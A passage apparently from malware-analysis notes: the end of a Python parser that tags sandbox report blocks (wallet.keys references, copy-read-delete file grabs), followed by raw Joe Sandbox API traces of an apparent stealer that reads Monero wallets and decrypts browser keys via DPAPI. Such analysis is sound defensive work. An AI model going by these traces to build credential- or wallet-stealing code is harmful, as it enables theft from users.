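        """String-like arguments (anything but '?' or an 8-hex-digit value) plus
        the '$'-separated String ID entries, de-duplicated in order of appearance."""
        out = []
        for call in self.calls:
            for arg in call["args"]:
                if arg != "?" and not HEX8.fullmatch(arg) and arg not in out:
                    out.append(arg)
        for s in self.string_id.split("$"):
            if s and s not in out:
                out.append(s)
        return out


def parse_blocks(text):
    """Split report text into FunctionBlocks; a bare 'APIs' line starts a block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.calls.append({"api": m.group("api"), "module": m.group("module"),
                                  "args": args, "ref": m.group("ref"), "sub": m.group("sub")})
            continue
        for label, attr in ID_FIELDS.items():
            m = re.match(rf"^\s*•\s*{label}:\s*(.*)$", line)
            if m:
                setattr(current, attr, m.group(1).strip())
                break
    return blocks


def classify(block):
    """Heuristic tags (assumed names) for the behaviours visible in this report."""
    tags, chain = [], block.direct_chain()
    # Copy a file, work on the copy, delete it: the file-grab shape of the wallet routines.
    if ("CopyFileA" in chain and "DeleteFileA" in chain
            and chain.index("CopyFileA") < chain.index("DeleteFileA")):
        tags.append("copy-read-delete file grab")
    # A library loaded by absolute path from the world-writable ProgramData tree.
    if any(c["api"].startswith("LoadLibrary")
           and any(a.lower().startswith("c:\\programdata\\") for a in c["args"])
           for c in block.calls):
        tags.append("LoadLibrary from ProgramData")
    if any(s.lower().endswith("wallet.keys") for s in block.strings()):
        tags.append("references wallet.keys")
    return tags


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(i, " -> ".join(b.direct_chain()), b.strings(), classify(b))
```

Feed the whole report text instead of SAMPLE to get every function in one pass; blocks that share an API String ID (the three wallet routines all carry 211194620-0) are the ones the report's Similarity section already groups, so that field is a cheap key for collapsing near-duplicate routines before triage.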
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: a1abc80e112b4299c6e7b0632f6960cf4d6f81b640220ae91083c9fc751b4040
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 0C51B07290120AAFEB299F54D891BBA77E4FF01310F3485B9ED0586691E731EE40EB90
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00ACA664
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 43dc7d3679da52fbe1942c644c5d9b51cc137ce6634d8c227a5fc30394ca8393
                                      • Instruction ID: db9f732007a7b652416dbeea162912ebb172943c276ac2f79bf949276134777c
                                      • Opcode Fuzzy Hash: 43dc7d3679da52fbe1942c644c5d9b51cc137ce6634d8c227a5fc30394ca8393
                                      • Instruction Fuzzy Hash: 65515A71A1020CEFDB14EFA4CE96FED7775BF60344F008119E90AAB291DB70AA45CB52
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00AE1678,00AE0D93), ref: 00ACF64C
                                      • lstrlen.KERNEL32(00000000), ref: 00ACF66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: b9f67a59c40cf22a622a527261f68ab5efce5f70f7a67710702c607bc8c88800
                                      • Instruction ID: 5128f9beedea144bbc464dfe6117b401460dbec73c72ff6ed889f37d42e78238
                                      • Opcode Fuzzy Hash: b9f67a59c40cf22a622a527261f68ab5efce5f70f7a67710702c607bc8c88800
                                      • Instruction Fuzzy Hash: 4C51FF76D10108ABCB04FBF4DEA6DED7379AF64300F40856AF45767291EE346A09CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: 9a96eb3009ce8bb29963e32b8ea7f24f39978487c611eab81151c89b19471e37
                                      • Instruction ID: b8258dc7425c69ca34e5162217d0e333458999ae6b02636eece088ee02dba84d
                                      • Opcode Fuzzy Hash: 9a96eb3009ce8bb29963e32b8ea7f24f39978487c611eab81151c89b19471e37
                                      • Instruction Fuzzy Hash: B5411D72D10209ABCF04EFA5D955EEEB779AF54304F00841AF51776390EB709A45CFA2
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00ACA489
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                        • Part of subcall function 00ACA210: LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                        • Part of subcall function 00ACA210: LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                        • Part of subcall function 00ACA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ACA2D4
                                        • Part of subcall function 00ACA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00ACA2F3
                                        • Part of subcall function 00ACA2B0: LocalFree.KERNEL32(?), ref: 00ACA323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: e8f1a9b910226c40dcda042627b753c46bf2bedc5d79b260a810399c033e0c36
                                      • Instruction ID: ae49513b6739616462679fcfc5892afdf3a2913a2ccea4db7d963d1cb93cde5d
                                      • Opcode Fuzzy Hash: e8f1a9b910226c40dcda042627b753c46bf2bedc5d79b260a810399c033e0c36
                                      • Instruction Fuzzy Hash: 573110B6D1120DABCF04DB98DD45EFFB7B8BB68304F444519E906A7241E7359E04CBA2
                                      APIs
                                      • memset.MSVCRT ref: 00AD967B
                                        • Part of subcall function 00AD8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AD96AE,00000000), ref: 00AD8EEB
                                        • Part of subcall function 00AD8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD8EF2
                                        • Part of subcall function 00AD8EE0: wsprintfW.USER32 ref: 00AD8F08
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00AD973B
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9759
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9766
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 51962a28eba9655500c23bd808997e99fb875d32e2801c14f4a68e72ed5f5a24
                                      • Instruction ID: 551fa8261b09c3aec5fd838176b650d31040a9d4dd709e13667ae96a95e41991
                                      • Opcode Fuzzy Hash: 51962a28eba9655500c23bd808997e99fb875d32e2801c14f4a68e72ed5f5a24
                                      • Instruction Fuzzy Hash: CA311A75E10308ABDB14DFE0CD49BEEB779BB44700F10445AF506AB284EB74AA48CB61
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00AE05BF), ref: 00AD885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00AD886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00AD8883
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • CloseHandle.KERNEL32(?), ref: 00AD88F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 2b38d64163d45fefd752a562a6007d6d61662053e11e29c529600c015defd758
                                      • Instruction ID: b5067ea31f53778067b4eac30ea99259bcec660cca7e09f333f99c396c3ea9c6
                                      • Opcode Fuzzy Hash: 2b38d64163d45fefd752a562a6007d6d61662053e11e29c529600c015defd758
                                      • Instruction Fuzzy Hash: C4316872911218ABCB24EF95CD55FEEB378FB15740F10459AF10BA22A0DB306E44CFA1
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B3FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B3FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 54ab30d738eb32808ad00ba9e52ac230ea3fc53696b63368d2ec8dcd3f8e66d4
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 3901B136909732AEFA3426B85CC997636D4EB017B5B304BBAF216802F2EF514C85A140
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AE0DE8,00000000,?), ref: 00AD7B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00AE0DE8,00000000,?), ref: 00AD7B54
                                      • wsprintfA.USER32 ref: 00AD7B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 625f2e02e49dbedfd5ba4c74ac752bdd50a7b464b2eb2d3b0e08bb1e5166917f
                                      • Instruction ID: 4f5a21ccbd6695855debe77b9648c71fe615ba8e8e7d6a2442b5927484283d5c
                                      • Instruction Fuzzy Hash: EC1139B2918218ABCB14DFC9DD45BBEB7B8FB4CB11F10425BF606A2280E7795940C7B4
                                      APIs
                                      • CreateFileA.KERNEL32(00AD3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00AD3D3E,?), ref: 00AD948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00AD3D3E), ref: 00AD94A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00AD94B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 5e72c97e7481c2359370b884c741518508466767e15dd451600be00d27725f69
                                      • Instruction ID: 826f39499c09e48d3115f34f66b5287a1e6d1dfb9f326665d39fe816429f7ce1
                                      • Instruction Fuzzy Hash: BEF03779E14308BBDB10DBB0EC59F9F77B9AB48710F108695FA16E7380D670AA018B90
                                      APIs
                                      • __getptd.LIBCMT ref: 00ADCA7E
                                        • Part of subcall function 00ADC2A0: __amsg_exit.LIBCMT ref: 00ADC2B0
                                      • __getptd.LIBCMT ref: 00ADCA95
                                      • __amsg_exit.LIBCMT ref: 00ADCAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00ADCAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: cb9c27aa399a50c265e842e79e23c39322ebdee2783130ab3b529eeb5a0fd8bf
                                      • Instruction ID: c3c544f94fba7ee865408975159df28554ddba9b52860e270aa611b9b74d90fc
                                      • Instruction Fuzzy Hash: 66F09632954316DBD620FBA8594774E33A1AF00B70F91014BF4079A3E2DF245941DBA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: 72ec9c40ad02b4cd0436f3cc185ebc1a786226a2972c1a9111fd638552a77b12
                                      • Instruction Fuzzy Hash: 04414971900209AFDF15EF98DC81AAEBBF5FF58304F198199FA05A6211D3359A50EF50
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD51CA
                                      • lstrcat.KERNEL32(?,00AE1058), ref: 00AD51E7
                                      • lstrcat.KERNEL32(?,01548BA8), ref: 00AD51FB
                                      • lstrcat.KERNEL32(?,00AE105C), ref: 00AD520D
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4B7C
                                        • Part of subcall function 00AD4B60: FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                        • Part of subcall function 00AD4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                        • Part of subcall function 00AD4B60: FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: aa18cc115c2afeb401b776b7e92267948ca37e8392c4b81afdfd18e981603eec
                                      • Instruction ID: 81b6113264661fa0176612dd96d5313bd3a35690da3eb1f71a351d600920ffb8
                                      • Instruction Fuzzy Hash: 7321CC76A00308A7DB14FB70ED46FED333CAB59300F00455AB596D7291EE75EAC88BA5